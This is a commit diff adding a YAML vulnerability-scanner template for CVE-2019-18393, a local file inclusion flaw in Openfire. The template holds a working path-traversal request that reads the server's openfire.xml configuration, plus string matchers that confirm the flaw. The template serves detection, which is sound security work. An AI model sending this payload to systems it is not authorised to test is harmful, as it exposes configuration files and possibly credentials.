Create CVE-2019-18393.yaml

cves/2019/CVE-2019-18393.yaml

@@ -0,0 +1,24 @@
+id: CVE-2019-18393
+info:
+  name: Openfire LFI 
+  author: pikpikcu
+  severity: high
+  reference: https://www.seebug.org/vuldb/ssvid-98329q
+  tags: cve,cve2019,openfire,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/plugins/search/..\..\..\conf\openfire.xml'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "org.jivesoftware.database.EmbeddedConnectionProvider"
+          - "Most properties are stored in the Openfire database"
+        part: body
+
+      - type: status
+        status:
+          - 200